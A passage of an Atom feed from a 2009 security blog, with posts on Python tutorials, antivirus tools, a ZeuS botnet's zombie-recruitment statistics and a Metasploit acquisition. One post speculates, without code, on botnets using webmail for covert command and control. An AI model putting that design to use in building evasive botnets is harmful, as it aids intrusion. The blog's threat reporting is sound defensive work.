src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6766263746795718144.post-8023990506919369005</id><published>2009-10-30T13:49:00.002-11:00</published><updated>2009-10-30T13:57:42.249-11:00</updated><title type='text'>Python Programming Tutorial - 1 - Installing Python</title><content type='html'>Python Programming Tutorial - 1 - Installing Python&lt;br /&gt;&lt;br /&gt;Bucky from &lt;a href="http://www.youtube.com/user/thenewboston"&gt;thenewboston&lt;/a&gt; channel is offering free python learning videos. If you guys really wanna learn more about python, this video gives you an introduction to installation of Python.&lt;br /&gt;&lt;br /&gt;&lt;object width="425" height="344"&gt;&lt;param name="movie" value="http://www.youtube.com/v/4Mf0h3HphEA&amp;hl=en&amp;fs=1&amp;"&gt;&lt;/param&gt;&lt;param name="allowFullScreen" value="true"&gt;&lt;/param&gt;&lt;param name="allowscriptaccess" value="always"&gt;&lt;/param&gt;&lt;embed src="http://www.youtube.com/v/4Mf0h3HphEA&amp;hl=en&amp;fs=1&amp;" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="425" height="344"&gt;&lt;/embed&gt;&lt;/object&gt;&lt;br /&gt;&lt;br /&gt;We will check out other tutorial videos that he is offering and start uploading here, one at a time.&lt;br /&gt;&lt;br /&gt;EF&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6766263746795718144-8023990506919369005?l=evilfingers.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://evilfingers.blogspot.com/feeds/8023990506919369005/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6766263746795718144&amp;postID=8023990506919369005' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6766263746795718144/posts/default/8023990506919369005'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6766263746795718144/posts/default/8023990506919369005'/><link rel='alternate' type='text/html' href='http://evilfingers.blogspot.com/2009/10/python-programming-tutorial-1.html' title='Python Programming Tutorial - 1 - Installing Python'/><author><name>Anushree</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6766263746795718144.post-8647817315556604786</id><published>2009-10-30T09:57:00.001-11:00</published><updated>2009-10-30T10:00:30.094-11:00</updated><title type='text'>Total Security 2009 Removal Instructions</title><content type='html'>This video released on Sep 30, 2009. This is great info.&lt;br /&gt;&lt;br /&gt;&lt;object width="425" height="344"&gt;&lt;param name="movie" value="http://www.youtube.com/v/Bb72Yl6gnbc&amp;hl=en&amp;fs=1&amp;"&gt;&lt;/param&gt;&lt;param name="allowFullScreen" value="true"&gt;&lt;/param&gt;&lt;param name="allowscriptaccess" value="always"&gt;&lt;/param&gt;&lt;embed src="http://www.youtube.com/v/Bb72Yl6gnbc&amp;hl=en&amp;fs=1&amp;" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="425" height="344"&gt;&lt;/embed&gt;&lt;/object&gt;&lt;br /&gt;&lt;br /&gt;Check it out!&lt;br /&gt;&lt;br /&gt;EF&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6766263746795718144-8647817315556604786?l=evilfingers.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://evilfingers.blogspot.com/feeds/8647817315556604786/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6766263746795718144&amp;postID=8647817315556604786' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6766263746795718144/posts/default/8647817315556604786'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6766263746795718144/posts/default/8647817315556604786'/><link rel='alternate' type='text/html' href='http://evilfingers.blogspot.com/2009/10/total-security-2009-removal.html' title='Total Security 2009 Removal Instructions'/><author><name>Anushree</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6766263746795718144.post-5055034782693119461</id><published>2009-10-30T04:26:00.002-11:00</published><updated>2009-10-30T04:42:44.565-11:00</updated><title type='text'>Google's Success: One of the major reasons</title><content type='html'>When Google was hiring in 1999-2000, I was wondering why they were looking for Algorithm as major focus. They were hiring professionals who were strong with Algorithms, Programming Languages and Computer Architecture, something that I considered as basic stuff when in my college days. But then later, @ some point of time when I got into work, I started finding that foundations are harder to learn than the stuff that comes new.&lt;br /&gt;&lt;br /&gt;It is always some new technology or new terminologies that people talk about in many of the community talks or meetings. It is normal to use technical jargon's to show off that someone knows something, but it is very hard to show off that someone knows basics. It is either proven by practical implementation on situations, or even in day to day life when you resolve a situation. Google looks for those kinds of people who are naturally talented in building stuff, destroying barriers and who goes beyond what is required. These are the people who are strong in their foundations. Foundations are most essential when it comes to building something big, especially something as big as Google.&lt;br /&gt;&lt;br /&gt;This is one of the major reasons of Google's success. Bravo guys! Really good planning...&lt;br /&gt;&lt;br /&gt;EF&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6766263746795718144-5055034782693119461?l=evilfingers.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://evilfingers.blogspot.com/feeds/5055034782693119461/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6766263746795718144&amp;postID=5055034782693119461' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6766263746795718144/posts/default/5055034782693119461'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6766263746795718144/posts/default/5055034782693119461'/><link rel='alternate' type='text/html' href='http://evilfingers.blogspot.com/2009/10/googles-success-one-of-major-reasons.html' title='Google&apos;s Success: One of the major reasons'/><author><name>Anushree</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6766263746795718144.post-5978615521588788680</id><published>2009-10-30T04:19:00.002-11:00</published><updated>2009-10-30T04:26:00.288-11:00</updated><title type='text'>Python Enhancement Proposals[PEP]</title><content type='html'>&lt;a href="http://www.python.org/dev/peps/"&gt;Python Enhancement Proposals[PEP]&lt;/a&gt; is a list of enhancements written by the Python community. What we love about this is that, they have also written Python Styling a.k.a. &lt;a href="http://www.python.org/dev/peps/pep-0008/"&gt;coding conventions&lt;/a&gt; as a part of the PEP. This structuring looks more like a constitution of the Python Dynasty. &lt;br /&gt;&lt;br /&gt;We [EvilFingers] are planning to launch Open Source Initiative[EFOSI] as a part of our tribute to the Python Community. LogsAnalytics[which will be releasing soon] will come with log parsers, log correlation and log analysis tools that would be purely coded in Python and will be open sourced for all our users to get the greater benefit off Python. &lt;br /&gt;&lt;br /&gt;Thanks to &lt;a href="http://en.wikipedia.org/wiki/Guido_van_Rossum"&gt;Guido van Rossum&lt;/a&gt; for all of his contributions to the Python world. He works for Google.&lt;br /&gt;&lt;br /&gt;EF&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6766263746795718144-5978615521588788680?l=evilfingers.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://evilfingers.blogspot.com/feeds/5978615521588788680/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6766263746795718144&amp;postID=5978615521588788680' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6766263746795718144/posts/default/5978615521588788680'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6766263746795718144/posts/default/5978615521588788680'/><link rel='alternate' type='text/html' href='http://evilfingers.blogspot.com/2009/10/python-enhancement-proposalspep.html' title='Python Enhancement Proposals[PEP]'/><author><name>Anushree</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6766263746795718144.post-5817780085676557139</id><published>2009-10-30T03:28:00.003-11:00</published><updated>2009-10-30T03:42:45.885-11:00</updated><title type='text'>Mac Users: Here is your Anti-virus</title><content type='html'>When we talked to some of the Mac users, they asked us if we recommend any good Anti-virus Software for Mac community. Although, we are planning to work on Mac tools, it will certainly take time for us to catch up.&lt;br /&gt;&lt;br /&gt;Hence, for now we recommend "iAntiVirus", which is part of PCTools. Here is how it looks:[The following snapshots were taken from http://www.iantivirus.com/screenshots/ and PCTools/iAntiVirus Reserves all the rights]&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Update Settings Window:&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_gJDtaXmerr4/Sur6HV2KanI/AAAAAAAAAWI/IL2-F-Jo00o/s1600-h/settingssu.png"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 320px; height: 238px;" src="http://4.bp.blogspot.com/_gJDtaXmerr4/Sur6HV2KanI/AAAAAAAAAWI/IL2-F-Jo00o/s320/settingssu.png" border="0" alt=""id="BLOGGER_PHOTO_ID_5398402107387308658" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Settings Window:&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_gJDtaXmerr4/Sur6HAwDuwI/AAAAAAAAAWA/uSi11B_Z07A/s1600-h/settings.png"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 320px; height: 238px;" src="http://4.bp.blogspot.com/_gJDtaXmerr4/Sur6HAwDuwI/AAAAAAAAAWA/uSi11B_Z07A/s320/settings.png" border="0" alt=""id="BLOGGER_PHOTO_ID_5398402101724560130" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Scanner Progress Window:&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/_gJDtaXmerr4/Sur6G0K7YGI/AAAAAAAAAV4/Le3e63hFK_Q/s1600-h/scanprogress.png"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 320px; height: 232px;" src="http://3.bp.blogspot.com/_gJDtaXmerr4/Sur6G0K7YGI/AAAAAAAAAV4/Le3e63hFK_Q/s320/scanprogress.png" border="0" alt=""id="BLOGGER_PHOTO_ID_5398402098347597922" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Quick Scan Window:&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_gJDtaXmerr4/Sur6GvjxOfI/AAAAAAAAAVw/Wch0Lv9NrzY/s1600-h/quickscan.png"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 320px; height: 232px;" src="http://4.bp.blogspot.com/_gJDtaXmerr4/Sur6GvjxOfI/AAAAAAAAAVw/Wch0Lv9NrzY/s320/quickscan.png" border="0" alt=""id="BLOGGER_PHOTO_ID_5398402097109613042" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Main Window:&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/_gJDtaXmerr4/Sur6GYnN5OI/AAAAAAAAAVo/pnoobyUM2OU/s1600-h/main.png"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 320px; height: 238px;" src="http://3.bp.blogspot.com/_gJDtaXmerr4/Sur6GYnN5OI/AAAAAAAAAVo/pnoobyUM2OU/s320/main.png" border="0" alt=""id="BLOGGER_PHOTO_ID_5398402090950059234" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;If you are interested in full version, you could purchase it at the &lt;a href="http://www.pctools.com/iantivirus/purchase/"&gt;iAntiVirus&lt;/a&gt; site.&lt;br /&gt;&lt;br /&gt;If you have any questions or concerns, contact PCTools &lt;a href="http://www.pctools.com/contact/"&gt;here&lt;/a&gt;.&lt;br /&gt;&lt;br /&gt;EF&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6766263746795718144-5817780085676557139?l=evilfingers.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://evilfingers.blogspot.com/feeds/5817780085676557139/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6766263746795718144&amp;postID=5817780085676557139' title='3 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6766263746795718144/posts/default/5817780085676557139'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6766263746795718144/posts/default/5817780085676557139'/><link rel='alternate' type='text/html' href='http://evilfingers.blogspot.com/2009/10/mac-users-here-is-your-anti-virus.html' title='Mac Users: Here is your Anti-virus'/><author><name>Anushree</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://4.bp.blogspot.com/_gJDtaXmerr4/Sur6HV2KanI/AAAAAAAAAWI/IL2-F-Jo00o/s72-c/settingssu.png' height='72' width='72'/><thr:total>3</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6766263746795718144.post-8361009837338581858</id><published>2009-10-27T15:53:00.002-11:00</published><updated>2009-10-27T16:07:11.986-11:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Jorge Mieres'/><category scheme='http://www.blogger.com/atom/ns#' term='zeus'/><category scheme='http://www.blogger.com/atom/ns#' term='botnet'/><title type='text'>ZeuS and power Botnet zombie recruitment</title><content type='html'>As I have said on several occasions, ZeuS botnets is one of the more "media" (hence one of the best known and popular), more aggressive and criminal activity that has more advanced functions that allow &lt;a style="color: rgb(51, 51, 255);" href="http://mipistus.blogspot.com/2009/03/phishing-kit-creador-automatico-de.html"&gt;phishing attacks&lt;/a&gt;, monitor the zombies in real time and collect all this information through different protocols.&lt;br /&gt;&lt;br /&gt;These activities primarily aggressive propose methodologies to obtain confidential information from compromised computers for some of the variants that are part of the family ZeuS, now have a wide range of fake pages of banks and financial institutions exclusively for the collection of information through phishing.&lt;br /&gt;&lt;br /&gt;Also the possibility of having a monitoring module through which the botmaster can be displayed in real time absolutely everything that is done on the PC zombie (navigation webmail services, banking, online chatting, etc.) poses a serious threat directly undermines confidentiality.&lt;br /&gt;&lt;br /&gt;And although many may seem a trivial issue, the mere fact of knowing that your developer updated every version of ZeuS, since 2007, approximately once per month, is an important point that marks the reason for its popularity in the environment under .&lt;br /&gt;&lt;br /&gt;But nevertheless, despite all this still doesn't seem to be valued at its true implications are implicit security activities, not only of ZeuS but of any of the alternatives crimeware that daily bombard the Internet with their criminal actions.&lt;br /&gt;&lt;br /&gt;Perhaps what follows I will show is a key to understanding the true extent of crime that have this type of activity. This is a botnet ZeuS with a short life span, but with a large amount of zombies that swarm recruited in his headquarters under the tutelage of "dealer" waiting for orders.&lt;br /&gt;&lt;br /&gt;The following screenshot shows the zombies recruited only in Russia, in this case by the botmaster logged under the name "&lt;span style="font-style: italic;"&gt;russian&lt;/span&gt;". This information is obtained through the filtering option, limiting the search with the acronym of the country (UK).&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_Ppq0fEGkHo4/SuODnJsqO1I/AAAAAAAAB38/Xz2aZpQtZ5E/s1600-h/mipistus-zeus-russian.png"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 400px; height: 221px;" src="http://4.bp.blogspot.com/_Ppq0fEGkHo4/SuODnJsqO1I/AAAAAAAAB38/Xz2aZpQtZ5E/s400/mipistus-zeus-russian.png" alt="" id="BLOGGER_PHOTO_ID_5396301487161359186" border="0" /&gt;&lt;/a&gt;Now ... one of the questions that perhaps many times we become the talk of botnets is what recruiting is the ability they possess? and although the response is relative might say that has no limits, or that the limit will be given in terms of the capacity of servers used by botmasters.&lt;br /&gt;&lt;br /&gt;But, following the example above, we have a sufficiently specific about the power of recruiting has, in this case, the botmaster "&lt;span style="font-style: italic;"&gt;russian&lt;/span&gt;".&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/_Ppq0fEGkHo4/SuODc2n5HWI/AAAAAAAAB30/7heDxjnHqkQ/s1600-h/mipistus-zeus-russian-zombis.png"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 400px; height: 209px;" src="http://2.bp.blogspot.com/_Ppq0fEGkHo4/SuODc2n5HWI/AAAAAAAAB30/7heDxjnHqkQ/s400/mipistus-zeus-russian-zombis.png" alt="" id="BLOGGER_PHOTO_ID_5396301310242397538" border="0" /&gt;&lt;/a&gt;With an activity of three (3) months with an amount of 24.830 zombies. Something like ZeuS almost 276 infections per day. And if we follow the logic, statistically speaking, the number could quadruple over the year.&lt;br /&gt;&lt;br /&gt;Furthermore, the ability to manage a botnet via web, also means that can be administered several at once, ie several botmasters can use the same web application (in this case ZeuS) to control "their" zombies. Thus, the user "russian" possesses a significant activity. But we can also obtain information from their peers who are managing zombies under the same domain.&lt;br /&gt;&lt;br /&gt;For example, the user "&lt;span style="font-style: italic;"&gt;system&lt;/span&gt;" has recruited 10.184 zombies but over a period of 30 days. Approximately 335 zombies per day. All through a single botnet ZeuS. Can you imagine how many ZeuS how are you are In-the-Wild?&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/_Ppq0fEGkHo4/SuODuxUuxJI/AAAAAAAAB4E/3s2XgBVnXwo/s1600-h/mipistus-zeus-system-zombis.png"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 400px; height: 209px;" src="http://3.bp.blogspot.com/_Ppq0fEGkHo4/SuODuxUuxJI/AAAAAAAAB4E/3s2XgBVnXwo/s400/mipistus-zeus-system-zombis.png" alt="" id="BLOGGER_PHOTO_ID_5396301618057495698" border="0" /&gt;&lt;/a&gt;While less activity botmaster has only 34 zombies, but less than 1 hour.&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/_Ppq0fEGkHo4/SuOD1fC0p8I/AAAAAAAAB4M/bKNccsQy3dk/s1600-h/mipistus-zeus-root-zombis.png"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 400px; height: 214px;" src="http://3.bp.blogspot.com/_Ppq0fEGkHo4/SuOD1fC0p8I/AAAAAAAAB4M/bKNccsQy3dk/s400/mipistus-zeus-root-zombis.png" alt="" id="BLOGGER_PHOTO_ID_5396301733409630146" border="0" /&gt;&lt;/a&gt;In summary, irrespective of length of activity of one or another botnet, the recruitment rate is very high.&lt;br /&gt;&lt;br /&gt;This also means that prevention mechanisms aren't sufficiently effective, and indeed a &lt;a style="color: rgb(51, 51, 255);" href="http://mipistus.blogspot.com/2009/09/eficacia-de-los-antivirus-frente-zeus.html"&gt;recent study&lt;/a&gt; shows clearly that the mechanisms are elusive ZeuS incorporating sufficiently effective against the mechanisms of detection of many current anti-virus solutions.&lt;br /&gt;&lt;br /&gt;However, under a more rigorous, current &lt;a style="color: rgb(51, 51, 255);" href="http://mipistus.blogspot.com/2009/07/automatizacion-de-procesos-anti.html"&gt;malware self-defense mechanisms&lt;/a&gt; incorporate increasingly effective anti-virus doesn't mean that they aren't effective. Furthermore, not all pass through the security solution and &lt;a style="color: rgb(51, 51, 255);" href="http://mipistus.blogspot.com/2009/10/nivel-de-inmadurez-en-materia-de.html"&gt;much of the responsibility rests with the user&lt;/a&gt; and that, ultimately and in accordance with rigorous aspect, a system isn't infected itself.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Related information&lt;/span&gt;&lt;br /&gt;&lt;a style="color: rgb(51, 51, 255);" href="http://mipistus.blogspot.com/2009/10/zeus-spam-y-certificados-ssl.html"&gt;ZeuS, spam y certificados SSL&lt;/a&gt;&lt;br /&gt;&lt;a style="color: rgb(51, 51, 255);" href="http://mipistus.blogspot.com/2009/09/eficacia-de-los-antivirus-frente-zeus.html"&gt;Eficacia de los antivirus frente a ZeuS&lt;/a&gt;&lt;br /&gt;&lt;a style="color: rgb(51, 51, 255);" href="http://mipistus.blogspot.com/2009/07/especial-zeus-botnet-for-dummies.html"&gt;Especial!! ZeuS Botnet for Dummies&lt;/a&gt;&lt;br /&gt;&lt;a style="color: rgb(51, 51, 255);" href="http://mipistus.blogspot.com/2009/06/botnet-securizacion-en-la-nueva-version.html"&gt;Botnet. Securización en la nueva versión de ZeuS&lt;/a&gt;&lt;br /&gt;&lt;a style="color: rgb(51, 51, 255);" href="http://mipistus.blogspot.com/2009/06/fusion-un-concepto-adoptado-por-el.html"&gt;Fusión. Un concepto adoptado por el crimeware actual&lt;/a&gt;&lt;br /&gt;&lt;a style="color: rgb(51, 51, 255);" href="http://mipistus.blogspot.com/2009/05/zeus-carding-world-template-jugando.html"&gt;ZeuS Carding World Template. (...) la cara de la botnet&lt;/a&gt;&lt;br /&gt;&lt;a style="color: rgb(51, 51, 255);" href="http://mipistus.blogspot.com/2009/03/entidades-financieras-en-la-mira-de-la_27.html"&gt;Entidades financieras en la mira de la botnet Zeus II&lt;/a&gt;&lt;br /&gt;&lt;a style="color: rgb(51, 51, 255);" href="http://mipistus.blogspot.com/2009/03/entidades-financieras-en-la-mira-de-la.html"&gt;Entidades financieras en la mira de la botnet Zeus I&lt;/a&gt;&lt;br /&gt;&lt;a style="color: rgb(51, 51, 255);" href="http://mipistus.blogspot.com/2009/02/luckysploit-la-mano-derecha-de-zeus.html"&gt;LuckySploit, la mano derecha de Zeus&lt;/a&gt;&lt;br /&gt;&lt;a style="color: rgb(51, 51, 255);" href="http://mipistus.blogspot.com/2009/02/zeus-botnet-masiva-propagacion-de-su_22.html"&gt;ZeuS Botnet. Masiva propagación de su troyano II&lt;/a&gt;&lt;br /&gt;&lt;a style="color: rgb(51, 51, 255);" href="http://mipistus.blogspot.com/2009/02/zeus-botnet-masiva-propagacion-de-su.html"&gt;ZeuS Botnet. Masiva propagación de su troyano I&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Jorge Mieres&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6766263746795718144-8361009837338581858?l=evilfingers.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://evilfingers.blogspot.com/feeds/8361009837338581858/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6766263746795718144&amp;postID=8361009837338581858' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6766263746795718144/posts/default/8361009837338581858'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6766263746795718144/posts/default/8361009837338581858'/><link rel='alternate' type='text/html' href='http://evilfingers.blogspot.com/2009/10/zeus-and-power-botnet-zombie.html' title='ZeuS and power Botnet zombie recruitment'/><author><name>Jorge Mieres</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://4.bp.blogspot.com/_Ppq0fEGkHo4/SuODnJsqO1I/AAAAAAAAB38/Xz2aZpQtZ5E/s72-c/mipistus-zeus-russian.png' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6766263746795718144.post-855523505731585219</id><published>2009-10-25T20:20:00.004-11:00</published><updated>2009-10-26T06:18:34.703-11:00</updated><title type='text'>What next in Botnets?</title><content type='html'>For the past few weeks I had been thinking what could be next for Botnets to do C&amp;C. As we have already seen it being having C&amp;C over, IRC in older days, then it came to P2P, and then evolved to HTTP too some time back.&lt;br /&gt;&lt;br /&gt;So What next?&lt;br /&gt;&lt;br /&gt;Was thinking and thinking and then got it with a flash, how about Simple EMAIL communication is being used as C&amp;C for the bots to receive commands from their bot-masters. That would be mess right, as this would be very difficult to track and stop.&lt;br /&gt;&lt;br /&gt;Just think a bot having a bot-masters email ID integrated ( *** there could be more innovative way to have the bot-master ID, I will come to that point latter ***  ) and then it calls home just by sending a mail to the bot-master and he responds back by command in the mail body, all encrypted. More over the master need not to run his own C&amp;C server for mails, he could use any of the mail servers available in the internet, like GMail, Yahoo, Hotmail anything he feels like. all bots can respond to those IDs and the bot-master can just issue his commands to all incoming mails from the bots and issue commands, as most of the organizations and client machines will allow mail communication to happen, it will be really tough to stop. There could be more innovative ways to stop being reverse engineering , detection and Bot update mechanism, we all know about it more or less by now, and just think if all those mechanism is integrated, then it could be a big happening in the C&amp;C of botnets.&lt;br /&gt;&lt;br /&gt;This is just my thoughts, i am sure people around here in this community may have better thoughts on this concept, I would really appreciate your comments and thoughts on this article and this new future threat, which I think it could be.&lt;br /&gt;&lt;br /&gt;All those who agree can please put together your thoughts about some detection mechanism, for this method. And all those who don't agree, I would appreciate to put your line of thoughts too, that will be helpful if i am thinking wrong.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6766263746795718144-855523505731585219?l=evilfingers.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://evilfingers.blogspot.com/feeds/855523505731585219/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6766263746795718144&amp;postID=855523505731585219' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6766263746795718144/posts/default/855523505731585219'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6766263746795718144/posts/default/855523505731585219'/><link rel='alternate' type='text/html' href='http://evilfingers.blogspot.com/2009/10/what-next-in-botnets.html' title='What next in Botnets?'/><author><name>Worms And Exploits</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6766263746795718144.post-310191263796121268</id><published>2009-10-24T20:26:00.002-11:00</published><updated>2009-10-24T20:35:11.587-11:00</updated><title type='text'>Portable Apps Release</title><content type='html'>Thanks to the team and you folks(users), our tool has been released by PortableApps. To check out the portableApps page click &lt;b&gt;&lt;a href="http://portableapps.com/news/2009-10-22_-_spydllremover_portable_2.5"&gt;here&lt;/a&gt;&lt;/b&gt;.&lt;br /&gt;&lt;br /&gt;Thank you.&lt;br /&gt;EF&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6766263746795718144-310191263796121268?l=evilfingers.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://evilfingers.blogspot.com/feeds/310191263796121268/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6766263746795718144&amp;postID=310191263796121268' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6766263746795718144/posts/default/310191263796121268'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6766263746795718144/posts/default/310191263796121268'/><link rel='alternate' type='text/html' href='http://evilfingers.blogspot.com/2009/10/portable-apps-release.html' title='Portable Apps Release'/><author><name>Anushree</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6766263746795718144.post-5240531398009902242</id><published>2009-10-21T03:49:00.003-11:00</published><updated>2009-10-21T03:53:03.399-11:00</updated><title type='text'>Metasploit Acquired by Rapid7</title><content type='html'>For more info, &lt;a href="http://www.rapid7.com/metasploit-announcement.jsp"&gt;click here&lt;/a&gt;.&lt;br /&gt;&lt;br /&gt;Rapid7 is a Vulnerability Management company.&lt;br /&gt;&lt;br /&gt;**********COPIED AND PASTED FROM &lt;a href="http://www.rapid7.com/metasploit-announcement.jsp"&gt;HERE&lt;/a&gt;*******&lt;br /&gt;&lt;br /&gt;&lt;blockquote&gt;Rapid7 Acquired Metasploit&lt;br /&gt;&lt;br /&gt;October 21, 2009&lt;br /&gt;&lt;br /&gt;I'm extremely pleased to announce Rapid7's acquisition of Metasploit, the leading open source penetration testing framework and world's largest database of public, tested exploits. We believe the 